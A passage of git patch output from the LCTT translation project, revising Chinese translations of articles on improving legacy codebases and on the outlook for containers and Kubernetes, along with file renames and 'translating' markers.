BUG 出现的位置,以及对多种计数器造成的影响。 -This system will over time become invaluable in establishing the health of the system and will be a great companion next to the source code control system revision log where you can determine the point in time that a bug was introduced and what the effect was on the various counters. +这是简单的技巧去将每一个后端应用变成一个就像真实的簿记系统一样,所有数字必须匹配,只要他们在某个地方都不会有什么问题。 -我通常保持技术差 5 分钟一次(一小时 12 次),如果你的应用生成了更多或者更少的事件,你应该改变这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 -I usually keep these counters at a 5 minute resolution (so 12 buckets for an hour), but if you have an application that generates fewer or more events then you might decide to change the interval at which new buckets are created. All counters share the same database table and so each counter is simply a column in that table. +随着时间的推移,这个系统在监控健康方面变得非常宝贵,而且它也是使用源码控制修改系统日志的一个好伙伴,你可以使用它确认 BUG 出现的位置,以及对多种计数器造成的影响。 + +我通常保持 5 分钟(一小时 12 次)记录一次计数器,如果你的应用生成了更多或者更少的事件,你应该修改这个时间间隔。所有的计数器公用一个数据表,每一个记录都只是简单的一行。 -### Change only one thing at the time ### 一次只修改一处 -不要完全陷入一个陷阱,在提高代码或者平台可用性的同时添加新特性或者是修复 BUG。这会让你头大,现在必须问问你自己每一步操作想要每一步的什么结果并且将会使你早前建立的测试失效。 -Do not fall into the trap of improving both the maintainability of the code or the platform it runs on at the same time as adding new features or fixing bugs. This will cause you huge headaches because you now have to ask yourself every step of the way what the desired outcome is of an action and will invalidate some of the tests you made earlier. +不要完全陷入在提高代码或者平台可用性的同时添加新特性或者是修复 BUG 的陷阱。这会让你头大而且将会使你之前建立的测试失效,现在必须问问你自己,每一步的操作想要什么样的结果。 -### Platform changes -###改变平台 -如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一样。如果你觉得你会添加更多的文档和测试,但是不会比那更多,所有的业务逻辑和相互依赖跟从前一样保持不变。 -If you’ve decided to migrate the application to another platform then do this first  _but keep everything else exactly the same_ . If you want you can add more documentation or tests, but no more than that, all business logic and interdependencies should remain as before. +### 修改平台 -### Architecture changes -###改变架构 -接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的去改变代码为更高级的,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是时候让他模块化,大段代码分解成众多小的,不过不要把变量的名字和他的数据结构分开。 -The next thing to tackle is to change the architecture of the application (if desired). At this point in time you are free to change the higher level structure of the code, usually by reducing the number of horizontal links between modules, and thus reducing the scope of the code active during any one interaction with the end-user. If the old code was monolithic in nature now would be a good time to make it more modular, break up large functions into smaller ones but leave names of variables and data-structures as they were. -Hacker News [mannykannot][1] 指出,理所应当的,这一步不总是有必要的,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我也赞同这个,我应该加上这个,因此这里有一些更新。我非常想添加的是如果你修改高级代码的时候修改了一点点底层代码试着限制只修改一个文件或者一个不恰当的例子一个子系统,所以你尽可能的限制了修改的范围。其他方面你可能有个困难时期去排查你所做的修改。 -HN user [mannykannot][1] points - rightfully - out that this is not always an option, if you’re particularly unlucky then you may have to dig in deep in order to be able to make any architecture changes. I agree with that and I should have included it here so hence this little update. What I would further like to add is if you do both do high level changes and low level changes at least try to limit them to one file or worst case one subsystem so that you limit the scope of your changes as much as possible. Otherwise you might have a very hard time debugging the change you just made. +如果你决定转移你的应用到另外一个平台,最主要的是跟之前保持一样。如果你觉得你会添加更多的文档和测试,但是不要忘记这一点,所有的业务逻辑和相互依赖跟从前一样保持不变。 + +### 修改架构 + +接下来处理的是改变应用的结构(如果需要)。这一点上,你可以自由的修改高层的代码,通常是降低模块间的横向联系,这样可以降低代码活动期间对终端用户造成的影响范围。如果老代码是庞大的,那么现在正是让他模块化的时候,将大段代码分解成众多小的,不过不要把变量的名字和他的数据结构分开。 + +Hacker News [mannykannot][1] 网友指出,修改架构并不总是可行,如果你特别不幸的话,你可能为了改变一些架构必须付出沉重的代价。我也赞同这一点,我应该加上这一点,因此这里有一些补充。我非常想补充的是如果你修改高级代码的时候修改了一点点底层代码,那么试着限制只修改一个文件或者最坏的情况是只修改一个子系统,所以尽可能限制修改的范围。否则你可能很难调试刚才所做的更改。 -### Low level refactoring ### 底层代码的重构 -现在,你应该非常理解每一个模块的作用,准备做一些真正的工作吧:重构代码去提高可维护性和让代码准备添加新功能。这将很可能是项目的一部分消耗大部分时间,记录你做的,不要对模块做改变直到你彻底的记录他并且感觉理解了他。很自由的修改变量名和函数名以及数据结构去提高清晰度和统一性,添加测试(情况需要的话,包括单元测试)。 -By now you should have a very good understanding of what each module does and you are ready for the real work: refactoring the code to improve maintainability and to make the code ready for new functionality. This will likely be the part of the project that consumes the most time, document as you go, do not make changes to a module until you have thoroughly documented it and feel you understand it. Feel free to rename variables and functions as well as datastructures to improve clarity and consistency, add tests (also unit tests, if the situation warrants them). -### Fix bugs -### 修改bugs -现在你准备承担真实用户看到的改变,战斗的第一步将是积累了一整年很多的bugs,像往常一样,第一步证实问题仍然存在,对这个结果做个测试然后修复这个bug,你的 CI 和写的端对端测试应该让你安全在你犯了错误由于不太熟悉或者一些额外的事情。 -Now you’re ready to take on actual end-user visible changes, the first order of battle will be the long list of bugs that have accumulated over the years in the ticket queue. As usual, first confirm the problem still exists, write a test to that effect and then fix the bug, your CI and the end-to-end tests written should keep you safe from any mistakes you make due to a lack of understanding or some peripheral issue. +现在,你应该非常理解每一个模块的作用了,准备做一些真正的工作吧:重构代码以提高其可维护性并且使代码做好添加新功能的准备。这很可能是项目中最消耗时间的部分,记录你所做的任何操作,在你彻底的记录模块并且理解之前不要对它做任何修改。之后你可以自由的修改变量名、函数名以及数据结构以提高代码的清晰度和统一性,然后请做测试(情况允许的话,包括单元测试)。 + +### 修复 bugs + +现在准备做一些用户可见的修改,战斗的第一步是修复很多积累了一整年的bugs,像往常一样,首先证实 bug 仍然存在,然后编写测试并修复这个 bug,你的 CI 和端对端测试应该能避免一些由于不太熟悉或者一些额外的事情而犯的错误。 -### Database Upgrade ### 升级数据库 -如果在前面的都所谓之后你需要固定和可维护的数据库再一次你有一个选项去改变数据库或者替换数据库用一个不同的完整的,如果这是你打算做的,做到了所有的这些将能够帮助你通过可靠的方式做修改而不会碰到问题,你会完整的测试新数据库和新代码,所有测试可以确保你顺利的迁移。 -If required after all this is done and you are on a solid and maintainable codebase again you have the option to change the database schema or to replace the database with a different make/model altogether if that is what you had planned to do. All the work you’ve done up to this point will help to assist you in making that change in a responsible manner without any surprises, you can completely test the new DB with the new code and all the tests in place to make sure your migration goes off without a hitch. -### Execute on the roadmap + +如果在一个坚实且可维护的代码库上完成所有工作,如果你有更改数据库模式的计划,可以使用不同的完全替换数据库。 +把所有的这些都做完将能够帮助你更可靠的修改而不会碰到问题,你会完全的测试新数据库和新代码,所有测试可以确保你顺利的迁移。 + ### 按着路线图执行 + 祝贺你脱离的困境并且可以准备添加新功能了。 -Congratulations, you are out of the woods and are now ready to implement new functionality. -### Do not ever even attempt a big-bang rewrite -### 任何时候都不要企图推翻重写 +### 任何时候都不要尝试彻底重写 -推翻重写是那种注定会失败的项目,之一,你是 -A big-bang rewrite is the kind of project that is pretty much guaranteed to fail. For one, you are in uncharted territory to begin with so how would you even know what to build, for another, you are pushing  _all_  the problems to the very last day, the day just before you go ‘live’ with your new system. And that’s when you’ll fail, miserably. Business logic assumptions will turn out to be faulty, suddenly you’ll gain insight into why that old system did certain things the way it did and in general you’ll end up realizing that the guys that put the old system together weren’t maybe idiots after all. If you really do want to wreck the company (and your own reputation to boot) by all means, do a big-bang rewrite, but if you’re smart about it this is not even on the table as an option. +彻底重写是那种注定会失败的项目,一方面,你在一个未知的领域开始,所以你甚至不知道构建什么,另一方面,你会把所以的问题都推到新系统马上就要上线的前一天,非常不幸的是,这也是你失败的时候,假设业务逻辑存在问题,你会得到异样的眼光,那时您会突然明白为什么旧系统会用某种奇怪的方式来工作,最终也会意识到能将旧系统放在一起工作的人也不都是白痴。在那之后。如果你真的想破坏公司(和你自己的声誉),那就重写吧,但如果你足够聪明,彻底重写系统通常不会成为一个摆到桌上讨论的选项。 -### So, the alternative, work incrementally +### 所以,替代方法是增量迭代工作 -To untangle one of these hairballs the quickest path to safety is to take any element of the code that you do understand (it could be a peripheral bit, but it might also be some core module) and try to incrementally improve it still within the old context. If the old build tools are no longer available you will have to use some tricks (see below) but at least try to leave as much of what is known to work alive while you start with your changes. That way as the codebase improves so does your understanding of what it actually does. A typical commit should be at most a couple of lines. +要解开这些线团最快方法是,使用你熟悉的代码中任何的元素(它可能是外部的,他可以是内核模块),试着使用旧的上下文去增量提升,如果旧的构建工具已经不能用了,你将必须使用一些技巧(看下面)至少当你开始做修改的时候,试着尽力保留已知的工作。那样随着代码库的提升你也对代码的作用更加理解。一个典型的代码提交应该最多两行。 -### Release! +### 发布! -Every change along the way gets released into production, even if the changes are not end-user visible it is important to make the smallest possible steps because as long as you lack understanding of the system there is a fair chance that only the production environment will tell you there is a problem. If that problem arises right after you make a small change you will gain several advantages: +每一次的修改都发布到生产环境,即使一些修改不是用户可见的。使用最少的步骤也是很重要的,因为当你缺乏对系统的了解时,只有生产环境能够告诉你问题在哪里,如果你只做了一个很小的修改之后出了问题,会有一些好处: -* it will probably be trivial to figure out what went wrong +* 很容易弄清楚出了什么问题 +* 这是一个改进流程的好位置 +* 你应该马上更新文档展示你的新见解 -* you will be in an excellent position to improve the process +### 使用代理的好处 +如果你做 web 开发时在旧系统和用户之间加了代理。你能很容易的控制每一个网址哪些请求旧系统,哪些重定向到新系统,从而更轻松更精确的控制运行的内容以及谁能够看到。如果你的代理足够的聪明,你可以使用它发送一定比例的流量到个人的 URL,直到你满意为止,如果你的集成测试也连接到这个接口那就更好了。 -* and you should immediately update the documentation to show the new insights gained - -### Use proxies to your advantage - -If you are doing web development praise the gods and insert a proxy between the end-users and the old system. Now you have per-url control over which requests go to the old system and which you will re-route to the new system allowing much easier and more granular control over what is run and who gets to see it. If your proxy is clever enough you could probably use it to send a percentage of the traffic to the new system for an individual URL until you are satisfied that things work the way they should. If your integration tests also connect to this interface it is even better. - -### Yes, but all this will take too much time! - -Well, that depends on how you look at it. It’s true there is a bit of re-work involved in following these steps. But it  _does_  work, and any kind of optimization of this process makes the assumption that you know more about the system than you probably do. I’ve got a reputation to maintain and I  _really_  do not like negative surprises during work like this. With some luck the company is already on the skids, or maybe there is a real danger of messing things up for the customers. In a situation like that I prefer total control and an iron clad process over saving a couple of days or weeks if that imperils a good outcome. If you’re more into cowboy stuff - and your bosses agree - then maybe it would be acceptable to take more risk, but most companies would rather take the slightly slower but much more sure road to victory. +### 是的,这会花费很多时间 +这取决于你怎样看待它的,这是事实会有一些重复的工作涉及到这些步骤中。但是它确实有效,对于进程的任何一个优化都将使你对这样系统更加熟悉。我会保持声誉,并且我真的不喜欢在工作期间有负面的意外。如果运气好的话,公司系统已经出现问题,而且可能会影响客户。在这样的情况下,如果你更多地是牛仔的做事方式,并且你的老板同意可以接受冒更大的风险,我比较喜欢完全控制整个流程得到好的结果而不是节省两天或者一星期,但是大多数公司宁愿采取稍微慢一点但更确定的胜利之路。 -------------------------------------------------------------------------------- via: https://jacquesmattheij.com/improving-a-legacy-codebase -作者:[Jacques Mattheij ][a] -译者:[译者ID](https://github.com/译者ID) +作者:[Jacques Mattheij][a] +译者:[aiwhj](https://github.com/aiwhj) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 1f1a56c1732741a52b91196dd620c9b4c2dab228 Mon Sep 17 00:00:00 2001 From: Unknown Date: Sun, 3 Dec 2017 15:40:29 +0800 Subject: [PATCH 0156/1627] translated translated --- .../tech/20170530 How to Improve a Legacy Codebase.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20170530 How to Improve a Legacy Codebase.md (100%) diff --git a/sources/tech/20170530 How to Improve a Legacy Codebase.md b/translated/tech/20170530 How to Improve a Legacy Codebase.md similarity index 100% rename from sources/tech/20170530 How to Improve a Legacy Codebase.md rename to translated/tech/20170530 How to Improve a Legacy Codebase.md From 52263fb8cfab323740f04fbb8cbbc9ae0bf4da3c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 3 Dec 2017 15:47:40 +0800 Subject: [PATCH 0157/1627] Update 20171130 Wake up and Shut Down Linux Automatically.md --- .../20171130 Wake up and Shut Down Linux Automatically.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md index efb0937695..356bc8feba 100644 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -1,3 +1,7 @@ + +translating by HardworkFish +============================ + Wake up and Shut Down Linux Automatically ============================================================ From 203cec9c85a04ef78f44303821dc2715b7aaca3c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 3 Dec 2017 15:47:56 +0800 Subject: [PATCH 0158/1627] Update 20171130 Wake up and Shut Down Linux Automatically.md --- .../tech/20171130 Wake up and Shut Down Linux Automatically.md | 1 - 1 file changed, 1 deletion(-) diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md index 356bc8feba..048de5a217 100644 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -1,6 +1,5 @@ translating by HardworkFish -============================ Wake up and Shut Down Linux Automatically ============================================================ From 6a23fd90fe50ea0360dac2895487fe5b0ee4038e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sun, 3 Dec 2017 15:49:42 +0800 Subject: [PATCH 0159/1627] translating translating by HardworkFish --- .../tech/20171130 Wake up and Shut Down Linux Automatically.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md index 048de5a217..3a2c20ad52 100644 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md @@ -1,5 +1,5 @@ -translating by HardworkFish + translating by HardworkFish Wake up and Shut Down Linux Automatically ============================================================ From 0d3bf52593cd429317c8d70a506c9cd98266658f Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 16:55:49 +0800 Subject: [PATCH 0160/1627] =?UTF-8?q?=E9=94=99=E8=AF=AF=E7=9A=84=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E5=90=8D=E5=91=BD=E5=90=8D?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yongshouzhang 不能改文件名 --- ...南.md => 20170622 A users guide to links in the Linux filesystem.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{linux 文件链接用户指南.md => 20170622 A users guide to links in the Linux filesystem.md} (100%) diff --git a/translated/tech/linux 文件链接用户指南.md b/translated/tech/20170622 A users guide to links in the Linux filesystem.md similarity index 100% rename from translated/tech/linux 文件链接用户指南.md rename to translated/tech/20170622 A users guide to links in the Linux filesystem.md From b623203bf829b63371438140c16be8b0a9ea2fe1 Mon Sep 17 00:00:00 2001 From: YOliver <740614279@qq.com> Date: Sun, 3 Dec 2017 16:59:52 +0800 Subject: [PATCH 0161/1627] Update 20171130 Excellent Business Software Alternatives For Linux.md --- ...0171130 Excellent Business Software Alternatives For Linux.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md index 3469c62569..195b51423a 100644 --- a/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md +++ b/sources/tech/20171130 Excellent Business Software Alternatives For Linux.md @@ -1,3 +1,4 @@ +Yoliver istranslating. Excellent Business Software Alternatives For Linux ------- From 98b3ef5ff57c6008a2499a1fe452fd877a8d8e1c Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 17:55:47 +0800 Subject: [PATCH 0162/1627] PRF:20171120 Containers and Kubernetes Whats next.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yunfengHe 翻译的很专业顺畅。恭喜你,完成了第一篇翻译!接下来,你可以在翻译之余,对帮我做做校对吧~ --- ...20 Containers and Kubernetes Whats next.md | 45 ++++++++++--------- 1 file changed, 23 insertions(+), 22 deletions(-) diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index 5ed099c170..57f9379f7b 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -1,54 +1,55 @@ -容器技术和 k8s 的下一站: +容器技术和 K8S 的下一站 ============================================================ -### 想知道容器编排管理和 K8s 的最新展望么?来看看专家怎么说。 +> 想知道容器编排管理和 K8S 的最新展望么?来看看专家怎么说。 ![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") -如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额 。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 +如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 -来自 [_The new stack_][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成正在将 kubernetes(k8s)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 k8s 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8s ,但是百分之五十八的人员表示他们正在计划和准备使用 K8s。总而言之,容器和 Kuebernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对罗宾逊和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 k8s 的下一步发展。 +来自 [The new stack][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成使用者正在将 Kubernetes(K8S)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 K8S 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8S ,但是百分之五十八的人员表示他们正在计划和准备使用 K8S。总而言之,容器和 Kubernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对 Robinson 和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 K8S 的下一步发展。 -### **容器编排将被主流接受** +### 容器编排将被主流接受 像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 -### **更好的易用性** +### 更好的易用性 -人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的,单个的,被隔离的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 +人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的或单个的以隔离方式运行的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 -### **在 hybrid cloud 以及 multi-cloud 技术方面会有更多侧重** +### 在混合云以及多云技术方面会有更多侧重 -随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [hybrid cloud][11] 和 [muilti-cloud][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,容器和 k8s 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。 +随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [混合云][11] 和 [多云][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,“容器和 K8S 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。” 据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 -**[ 想知道 CIO 们对 hybrid cloud 和 multi cloud 的战略构想么? 请参看我们的这条相关资源, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** +**[ 想知道 CIO 们对混合云和多云的战略构想么? 请参看我们的这条相关资源, [Hybrid Cloud: The IT leader's guide][16]。 ]** -### **平台和工具的持续整合及加强** +### 平台和工具的持续整合及加强 -对任何一种科技来说,持续的整合和加强从来都是大势所趋; 容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8s 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其他的一些小众平台方案。因为 K8s 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8s 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”(cloud-neutral)。 +对任何一种科技来说,持续的整合和加强从来都是大势所趋;容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8S 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其它的一些小众平台方案。因为 K8S 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8S 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”cloud-neutral。 -### **K8s 的下一站** +### K8S 的下一站 -来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,k8s 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 k8s,k8s 仍有很长的路要走。 -专家们对[日益流行的 k8s 平台][19]也作出了以下一些预测: +来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,K8S 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 K8S,K8S 仍有很长的路要走。 -**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 k8s 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 k8s 上部署和监控微应用将会带来很多新的可能性。” +专家们对[日益流行的 K8S 平台][19]也作出了以下一些预测: -**_来自 Red Hat 的 Brian Gracely 表示:_** “k8s 所支持的应用的种类越来越多。今后在 k8s 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用,大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” +**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 K8S 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 K8S 上部署和监控微应用将会带来很多新的可能性。” -**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 k8s 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 k8s 将和第三方管理和监控平台融合起来。” +**_来自 Red Hat 的 Brian Gracely 表示:_** “K8S 所支持的应用的种类越来越多。今后在 K8S 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用、大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” -**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” +**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 K8S 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 K8S 将和第三方管理和监控平台融合起来。” -**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” +**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其它运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [编辑提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” + +**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ K8S 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 K8S 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 K8S 平台内部以及在外部服务商一端做出的一些改进。” ------------------------------------------------------------------------------- via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next -作者:[Kevin Casey ][a] +作者:[Kevin Casey][a] 译者:[yunfengHe](https://github.com/yunfengHe) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From d29e8223e0a74ac10b249a5b58476d42e2419f0c Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 3 Dec 2017 17:56:29 +0800 Subject: [PATCH 0163/1627] PUB:20171120 Containers and Kubernetes Whats next.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yunfengHe 文章发布地址:https://linux.cn/article-9104-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/yunfengHe --- .../20171120 Containers and Kubernetes Whats next.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171120 Containers and Kubernetes Whats next.md (100%) diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/published/20171120 Containers and Kubernetes Whats next.md similarity index 100% rename from translated/tech/20171120 Containers and Kubernetes Whats next.md rename to published/20171120 Containers and Kubernetes Whats next.md From a7326ccd7c410900d884a720c0ad1a13294a059b Mon Sep 17 00:00:00 